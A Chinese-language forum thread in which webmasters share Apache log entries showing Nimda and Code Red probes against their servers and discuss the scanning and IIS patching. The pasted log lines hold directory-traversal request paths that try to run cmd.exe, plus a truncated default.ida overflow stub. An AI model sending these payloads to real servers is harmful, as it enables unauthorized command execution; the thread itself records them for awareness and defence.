滿多白爛喜歡亂掃主機

[阿 土]

無聊看了一下 Apache log 檔 , 有美國/大陸那邊有無聊人士來亂掃主機

既然要 Hack 主機 , 也要先瞭解對方主機的 OS , 我用 unix 的 OS , 他們卻都用 NT 的方式想要駭進來.....

有用 NT 的人就看一下下面的目錄裡是否有這幾個 exe 檔 , 若有的話 , 請注意吧.

[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/root.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/MSADC/root.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/c/winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/d/winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Á../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..À‾../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..Áœ../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%5c../winnt/system32/cmd.exe
[client 202.104.128.164] File does not exist: /usr/local/apache/htdocs/scripts/..%2f../winnt/system32/cmd.exe

[christin]

errrrr
跟主題沒關...只是覺得那個妹妹好cute唷..
土大的女兒ㄇ..

[Ares]

阿土兄,可能是有中nimda的電腦在掃internet上的PC.恐怕連他的主人都不知道吧 ^^!

[kanako0605]

引用:

最初由 阿 土 發表
無聊看了一下 Apache log 檔 , 有美國/大陸那邊有無聊人士來亂掃主機
既然要 Hack 主機 , 也要先瞭解對方主機的 OS , 我用 unix 的 OS , 他們卻都用 NT 的方式想要駭進來.....

ㄏㄏ.....如果是真的話....那還真無聊且......ㄅㄣˋ!

[噩夢]

他們大陸有出一個掃主機的軟體,叫做流光,他會自動幫你掃出你的電腦有哪些漏洞,流光這
套軟體本身有限制他們大陸國內的ip好像不能掃,他的說明檔是說國內IP保留(指大陸),但是
可以掃台灣這邊的IP,我也用過這套軟體來掃自己的主機,他會把你的telnet,pop3,sendmail
ftp及其他你開放的port相關資訊給找出來,並且會用類似密碼檔的方式來暴力破一些用白痴
密碼的帳號,基本上他程式內定對方的主機是Un*X/Win兩種主機都掃,所以才會在你的Apache
Log黨內留下/script/xxxx等等的log...
在此勸告用IIS當web server的網管者,多多注意微軟方面的漏洞更新吧,目前有很多漏洞都
針對IIS而來,請自求多福..不然改天被hack了都不知道...

[Ares]

但是阿土兄所留的log,很明顯是中nimda的PC來攻擊所留下的,我想不會是別的入侵程式.

[oldtu]

沒錯
阿土站長所提供的log檔是nimda探路的訊息
可以彙整後向電信警察申報

[魔神]

危機四伏，我還是持功力高些再架站好了。

[Jacky7]

這是我租的國外host網站報告, 真看不懂他們再掃啥??

File not find Report

/scripts/..%255c../winnt/system32/cmd.exe
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
/scripts/root.exe
/scripts/root.exe?/c+dir
/scripts/..%5c../winnt/system32/cmd.exe
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir
/MSADC/root.exe
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe
/d/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.e...
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%...
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%...
/scripts/..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/winnt/system32/cmd.exe
/scripts/winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%252f../winnt/system32/cmd.exe
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
/default.ida
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN...
/robots.txt